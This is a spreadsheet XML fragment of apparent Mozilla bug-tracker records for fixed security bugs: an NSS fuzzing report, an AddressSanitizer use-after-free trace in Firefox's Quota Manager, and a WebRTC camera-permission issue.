      </c>
      <c r="S2582" t="inlineStr">
        <is>
          <t>3.23</t>
        </is>
      </c>
      <c r="T2582" t="n">
        <v>1</v>
      </c>
      <c r="U2582" t="n">
        <v>0</v>
      </c>
      <c r="V2582" t="n">
        <v>26</v>
      </c>
      <c r="W2582" t="inlineStr">
        <is>
          <t>Created attachment 8683168
test_case.der
I found this while fuzzing the CERT_DecodeBasicConstraintValue function. This function seems to be created to handle overflows while converting data but I'm not sure how this functionality (left shifting a negative value) is handled by different compilers or how this should be written differently, I'll leave it up to someone more qualified to answer such questions.
dersubr.c:205:14: runtime error: left shift of negative value -1
    #0 0x7fc7039213bf in DER_GetInteger_Util /home/user/code/san_nss/nss/lib/util/dersubr.c:205:14
    #1 0x7fc7045c6469 in CERT_DecodeBasicConstraintValue /home/user/code/san_nss/nss/lib/certdb/xbsconst.c:127:17
    #2 0x4df70b in Fuzz_CERT_DecodeBasicConstraintValue /home/user/code/san_nss/nss/cmd/checkcert/checkcert.c:80:7
    #3 0x4e114c in fuzz /home/user/code/san_nss/nss/cmd/checkcert/checkcert.c:181:5
    #4 0x4e267c in main /home/user/code/san_nss/nss/cmd/checkcert/checkcert.c:248:5
    #5 0x7fc7024f7ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #6 0x419305 in _start (/home/user/Desktop/cert-decode/checkcert+0x419305)
SUMMARY: AddressSanitizer: undefined-behavior dersubr.c:205:14 in</t>
        </is>
      </c>
      <c r="X2582" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2583">
      <c r="A2583" t="n">
        <v>1610880</v>
      </c>
      <c r="B2583" t="inlineStr">
        <is>
          <t>2020-01-22 09:26:34 -0800</t>
        </is>
      </c>
      <c r="C2583" t="inlineStr">
        <is>
          <t>heap-use-after-free (READ of size 8) in mozilla::dom::quota::QuotaObject::LockedMaybeUpdateSize</t>
        </is>
      </c>
      <c r="D2583" t="inlineStr">
        <is>
          <t>2024-05-30 10:11:11 -0700</t>
        </is>
      </c>
      <c r="E2583" t="n">
        <v>1</v>
      </c>
      <c r="F2583" t="n">
        <v>1</v>
      </c>
      <c r="G2583" t="n">
        <v>3</v>
      </c>
      <c r="H2583" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2583" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2583" t="inlineStr">
        <is>
          <t>Storage: Quota Manager</t>
        </is>
      </c>
      <c r="K2583" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2583" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2583" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2583" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2583" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2583" t="inlineStr">
        <is>
          <t>[adv-main74+][adv-esr68.6+]</t>
        </is>
      </c>
      <c r="Q2583" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2583" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2583" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T2583" t="n">
        <v>1</v>
      </c>
      <c r="U2583" t="n">
        <v>0</v>
      </c>
      <c r="V2583" t="n">
        <v>42</v>
      </c>
      <c r="W2583" t="inlineStr">
        <is>
          <t>Whilst browsing the web using Firefox Nightly (`ASAN` built from https://hg.mozilla.org/mozilla-central/rev/be3a05f615a557fd4c5171f789cc460688d9c3b8), the browser crashed. I had 38 tabs open, it's hard to say which one triggered this. 
```
==323834==ERROR: AddressSanitizer: heap-use-after-free on address 0x60f0007f8568 at pc 0x7f846b0a505b bp 0x7f84412f28b0 sp 0x7f84412f28a8
READ of size 8 at 0x60f0007f8568 thread T40 (IPDL Background)
    #0 0x7f846b0a505a in mozilla::dom::quota::QuotaObject::LockedMaybeUpdateSize(long, bool) /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:3285:39
    #1 0x7f846b0a3084 in mozilla::dom::quota::QuotaObject::MaybeUpdateSize(long, bool) /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:3226:10
    #2 0x7f846bf31100 in UpdateUsage /builds/worker/workspace/build/src/dom/localstorage/ActorsParent.cpp:5503:24
    #3 0x7f846bf31100 in NoteInactiveDatabase /builds/worker/workspace/build/src/dom/localstorage/ActorsParent.cpp:4941:28
    #4 0x7f846bf31100 in UnregisterSnapshot /builds/worker/workspace/build/src/dom/localstorage/ActorsParent.cpp:5680:15
    #5 0x7f846bf31100 in mozilla::dom::(anonymous namespace)::Snapshot::Finish() /builds/worker/workspace/build/src/dom/localstorage/ActorsParent.cpp:5965:14
    #6 0x7f846bf2ede9 in mozilla::dom::(anonymous namespace)::Snapshot::RecvFinish() /builds/worker/workspace/build/src/dom/localstorage/ActorsParent.cpp:6122:3
    #7 0x7f8465419a32 in mozilla::dom::PBackgroundLSSnapshotParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundLSSnapshotParent.cpp:215:28
    #8 0x7f8465435cbd in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundParent.cpp:3522:32
    #9 0x7f8464afc206 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2214:25
    #10 0x7f8464af8502 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2136:9
    #11 0x7f8464afa0f9 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1975:3
    #12 0x7f8464afa727 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2006:13
    #13 0x7f8463999d59 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1220:14
    #14 0x7f84639a3281 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #15 0x7f8464b049a3 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:332:5
    #16 0x7f8464a283e2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #17 0x7f8464a283e2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308:3
    #18 0x7f8464a283e2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290:3
    #19 0x7f8463993736 in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:464:10
    #20 0x7f847a1db288 in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #21 0x7f847d4464e1 in start_thread (/lib64/libpthread.so.0+0x94e1)
    #22 0x7f847d007692 in clone (/lib64/libc.so.6+0x101692)
0x60f0007f8568 is located 120 bytes inside of 168-byte region [0x60f0007f84f0,0x60f0007f8598)
freed by thread T46 (QuotaManager IO) here:
    #0 0x561eab6d592d in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
    #1 0x7f846b1283d1 in operator delete /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:51:10
    #2 0x7f846b1283d1 in Release /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:875:3
    #3 0x7f846b1283d1 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:50:40
    #4 0x7f846b1283d1 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:379:36
    #5 0x7f846b1283d1 in ~RefPtr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:81:7
    #6 0x7f846b1283d1 in Destruct /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:547:45
    #7 0x7f846b1283d1 in DestructRange /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2240:7
    #8 0x7f846b1283d1 in RemoveElementsAtUnsafe /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2299:3
    #9 0x7f846b1283d1 in nsTArray_Impl&lt;RefPtr&lt;mozilla::dom::quota::OriginInfo&gt;, nsTArrayInfallibleAllocator&gt;::RemoveElementsAt(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2293:3
    #10 0x7f846b0a6deb in mozilla::dom::quota::QuotaManager::LockedRemoveQuotaForOrigin(mozilla::dom::quota::PersistenceType, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:7472:16
    #11 0x7f846b10f234 in RemoveQuotaForOrigin /builds/worker/workspace/build/src/dom/quota/QuotaManager.h:227:5
    #12 0x7f846b10f234 in mozilla::dom::quota::(anonymous namespace)::ClearRequestBase::DeleteFiles(mozilla::dom::quota::QuotaManager*, mozilla::dom::quota::PersistenceType) /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:9705:24
    #13 0x7f846b10cdf1 in mozilla::dom::quota::(anonymous namespace)::ClearRequestBase::DoDirectoryWork(mozilla::dom::quota::QuotaManager*) /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp
    #14 0x7f846b0f5c3a in DirectoryWork /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:8266:8
    #15 0x7f846b0f5c3a in mozilla::dom::quota::(anonymous namespace)::OriginOperationBase::Run() /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:8164:12
    #16 0x7f8463999d59 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1220:14
    #17 0x7f84639a3281 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #18 0x7f8464b0485a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:302:20
    #19 0x7f8464a283e2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #20 0x7f8464a283e2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308:3
    #21 0x7f8464a283e2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290:3
    #22 0x7f8463993736 in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:464:10
    #23 0x7f847a1db288 in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #24 0x7f847d4464e1 in start_thread (/lib64/libpthread.so.0+0x94e1)
previously allocated by thread T46 (QuotaManager IO) here:
    #0 0x561eab6d5bad in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:145:3
    #1 0x561eab70aefd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f846b0ae3d1 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f846b0ae3d1 in mozilla::dom::quota::QuotaManager::EnsureQuotaForOrigin(mozilla::dom::quota::PersistenceType, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:4038:18
    #4 0x7f846bf3793a in DatabaseWork /builds/worker/workspace/build/src/dom/localstorage/ActorsParent.cpp:7312:19
    #5 0x7f846bf3793a in mozilla::dom::(anonymous namespace)::PrepareDatastoreOp::NestedRun() /builds/worker/workspace/build/src/dom/localstorage/ActorsParent.cpp:7805:12
    #6 0x7f846bf343d3 in mozilla::dom::(anonymous namespace)::LSRequestBase::Run() /builds/worker/workspace/build/src/dom/localstorage/ActorsParent.cpp
    #7 0x7f8463999d59 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1220:14
    #8 0x7f84639a3281 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #9 0x7f8464b049a3 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:332:5
    #10 0x7f8464a283e2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #11 0x7f8464a283e2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308:3
    #12 0x7f8464a283e2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290:3
    #13 0x7f8463993736 in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:464:10
    #14 0x7f847a1db288 in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #15 0x7f847d4464e1 in start_thread (/lib64/libpthread.so.0+0x94e1)
Thread T40 (IPDL Background) created by T0 here:
    #0 0x561eab6c033a in pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:209:3
    #1 0x7f847a1c9663 in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7f847a1b368e in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7f8463995d33 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:670:8
    #4 0x7f84639a2461 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:621:12
    #5 0x7f84639a5f43 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:139:57
    #6 0x7f8464abed79 in NS_NewNamedThread&lt;16&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:69:10
    #7 0x7f8464abed79 in (anonymous namespace)::ParentImpl::CreateBackgroundThread() /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:943:7
    #8 0x7f8464a89125 in CreateActorForSameProcess /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:853:32
    #9 0x7f8464a89125 in GetOrCreateForCurrentThread /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1455:9
    #10 0x7f8464a89125 in mozilla::ipc::BackgroundChild::GetOrCreateForCurrentThread(nsIEventTarget*) /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:657:10
    #11 0x7f8469e3c3d7 in mozilla::dom::ClientManager::ClientManager() /builds/worker/workspace/build/src/dom/clients/manager/ClientManager.cpp:50:7
    #12 0x7f8469e3f180 in mozilla::dom::ClientManager::GetOrCreateForCurrentThread() /builds/worker/workspace/build/src/dom/clients/manager/ClientManager.cpp:208:14
    #13 0x7f8469e30cea in mozilla::dom::ClientManager::CreateSource(mozilla::dom::ClientType, nsISerialEventTarget*, nsIPrincipal*) /builds/worker/workspace/build/src/dom/clients/manager/ClientManager.cpp:264:31
    #14 0x7f846f3bb43a in nsDocShell::MaybeCreateInitialClientSource(nsIPrincipal*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:2504:26
    #15 0x7f846f3ef16f in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIPrincipal*, nsIContentSecurityPolicy*, nsIURI*, bool, bool, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6597:5
    #16 0x7f846f3f033c in CreateAboutBlankContentViewer /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6655:10
    #17 0x7f846f3f033c in non-virtual thunk to nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIPrincipal*, nsIContentSecurityPolicy*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #18 0x7f846f4b753d in mozilla::AppWindow::Initialize(nsIAppWindow*, nsIAppWindow*, nsIURI*, int, int, bool, nsIRemoteTab*, mozIDOMWindowProxy*, nsWidgetInitData&amp;) /builds/worker/workspace/build/src/xpfe/appshell/AppWindow.cpp:297:21
    #19 0x7f846f4dcec3 in nsAppShellService::JustCreateTopWindow(nsIAppWindow*, nsIURI*, unsigned int, int, int, bool, nsIRemoteTab*, mozIDOMWindowProxy*, mozilla::AppWindow**) /builds/worker/workspace/build/src/xpfe/appshell/nsAppShellService.cpp:668:25
    #20 0x7f846f4de36d in nsAppShellService::CreateTopLevelWindow(nsIAppWindow*, nsIURI*, unsigned int, int, int, nsIRemoteTab*, mozIDOMWindowProxy*, nsIAppWindow**) /builds/worker/workspace/build/src/xpfe/appshell/nsAppShellService.cpp:172:8
    #21 0x7f846fdc7073 in nsAppStartup::CreateChromeWindow(nsIWebBrowserChrome*, unsigned int, nsIRemoteTab*, mozIDOMWindowProxy*, unsigned long, bool*, nsIWebBrowserChrome**) /builds/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:629:15
    #22 0x7f846ff9629d in CreateChromeWindow /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:419:33
    #23 0x7f846ff9629d in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, bool, nsDocShellLoadState*, mozilla::dom::BrowsingContext**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:904:12
    #24 0x7f846ff93822 in nsWindowWatcher::OpenWindow(mozIDOMWindowProxy*, char const*, char const*, char const*, nsISupports*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:292:3
    #25 0x7f84639d6351 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:106
    #26 0x7f846572be24 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1643:10
    #27 0x7f846572be24 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1184:19
    #28 0x7f846572be24 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1150:23
    #29 0x7f8465731ec4 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:947:10
    #30 0x7f84702b8c9e in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452:13
    #31 0x7f84702b8c9e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:544:12
    #32 0x7f84702a1e1d in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:612:10
    #33 0x7f84702a1e1d in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3021:16
    #34 0x7f8470284cb5 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:424:10
    #35 0x7f84702b95d8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:13
    #36 0x7f84702bb5a9 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:625:8
    #37 0x7f847045637b in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2734:10
    #38 0x7f846571c568 in nsXPCWrappedJS::CallMethod(unsigned short, nsXPTMethodInfo const*, nsXPTCMiniVariant*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:956:17
    #39 0x7f84639d79e1 in PrepareAndDispatch /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:125:37
    #40 0x7f84639d68ea in SharedStub (/home/geeknik/firefox/libxul.so+0x22fd8ea)
    #41 0x7f846fa7d5e6 in nsCommandLine::EnumerateHandlers(nsresult (*)(nsICommandLineHandler*, nsICommandLine*, void*), void*) /builds/worker/workspace/build/src/toolkit/components/commandlines/nsCommandLine.cpp:448:10
    #42 0x7f846fa7eb2a in nsCommandLine::Run() /builds/worker/workspace/build/src/toolkit/components/commandlines/nsCommandLine.cpp:503:8
    #43 0x7f847003ef37 in XREMain::XRE_mainRun() /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4537:19
    #44 0x7f84700415ee in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4740:8
    #45 0x7f8470042a10 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4821:21
    #46 0x561eab708511 in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:217:22
    #47 0x561eab708511 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:339:16
    #48 0x7f847cf2d1a2 in __libc_start_main (/lib64/libc.so.6+0x271a2)
Thread T46 (QuotaManager IO) created by T40 (IPDL Background) here:
    #0 0x561eab6c033a in pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:209:3
    #1 0x7f847a1c9663 in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7f847a1b368e in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7f8463995d33 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:670:8
    #4 0x7f84639a2461 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:621:12
    #5 0x7f84639a5f43 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:139:57
    #6 0x7f846b0a97e3 in NS_NewNamedThread&lt;16&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:69:10
    #7 0x7f846b0a97e3 in mozilla::dom::quota::QuotaManager::Init(nsTSubstring&lt;char16_t&gt; const&amp;) /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:3917:8
    #8 0x7f846b0a8a2f in mozilla::dom::quota::QuotaManager::GetOrCreate(nsIRunnable*, nsIEventTarget*) /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:3534:28
    #9 0x7f846b4d5b8a in FinishOpen /builds/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:20517:3
    #10 0x7f846b4d5b8a in mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp::Run() /builds/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:20649:12
    #11 0x7f8463999d59 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1220:14
    #12 0x7f84639a3281 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #13 0x7f8464b0485a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:302:20
    #14 0x7f8464a283e2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #15 0x7f8464a283e2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308:3
    #16 0x7f8464a283e2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290:3
    #17 0x7f8463993736 in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:464:10
    #18 0x7f847a1db288 in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #19 0x7f847d4464e1 in start_thread (/lib64/libpthread.so.0+0x94e1)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/quota/ActorsParent.cpp:3285:39 in mozilla::dom::quota::QuotaObject::LockedMaybeUpdateSize(long, bool)
Shadow bytes around the buggy address:
  0x0c1e800f7050: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c1e800f7060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1e800f7070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1e800f7080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1e800f7090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fd
=&gt;0x0c1e800f70a0: fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd
  0x0c1e800f70b0: fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1e800f70c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1e800f70d0: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
  0x0c1e800f70e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1e800f70f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323834==ABORTING
```</t>
        </is>
      </c>
      <c r="X2583" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2584">
      <c r="A2584" t="n">
        <v>1564588</v>
      </c>
      <c r="B2584" t="inlineStr">
        <is>
          <t>2019-07-09 14:42:34 -0700</t>
        </is>
      </c>
      <c r="C2584" t="inlineStr">
        <is>
          <t>Deep-linking to attacker-created rooms on already-trusted WebRTC sites may give unprompted camera/mic access</t>
        </is>
      </c>
      <c r="D2584" t="inlineStr">
        <is>
          <t>2020-06-05 00:22:33 -0700</t>
        </is>
      </c>
      <c r="E2584" t="n">
        <v>1</v>
      </c>
      <c r="F2584" t="n">
        <v>1</v>
      </c>
      <c r="G2584" t="n">
        <v>3</v>
      </c>
      <c r="H2584" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2584" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2584" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K2584" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2584" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2584" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2584" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2584" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2584" t="inlineStr">
        <is>
          <t>[adv-main69+][adv-esr68.1+]</t>
        </is>
      </c>
      <c r="Q2584" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2584" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2584" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2584" t="n">
        <v>1</v>
      </c>
      <c r="U2584" t="n">
        <v>0</v>
      </c>
      <c r="V2584" t="n">
        <v>26</v>
      </c>
      <c r="W2584" t="inlineStr">
        <is>
          <t>This is to record reasons to accelerate landing of feature policy, and to consider putting `getUserMedia` behind a user gesture, at least in deep link navigation cases where permission has been persisted.
In light of the recent [Zoom exploit](https://medium.com/@jonathan.leitschuh/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5), it's prudent to review our camera &amp; microphone permission handling. The zoom exploit allowed any web site—even third-party banner ads—to launch a user's installed zoom client into an attacker-created room with the user's camera and microphone turned on. It could do this from a background tab, at any time of the attacker’s choosing. The attacker could then record the user (or their environment if the user isn't present atm).
Firefox fares better than Zoom, not allowing this by default, but is not 100% free of similar issues.
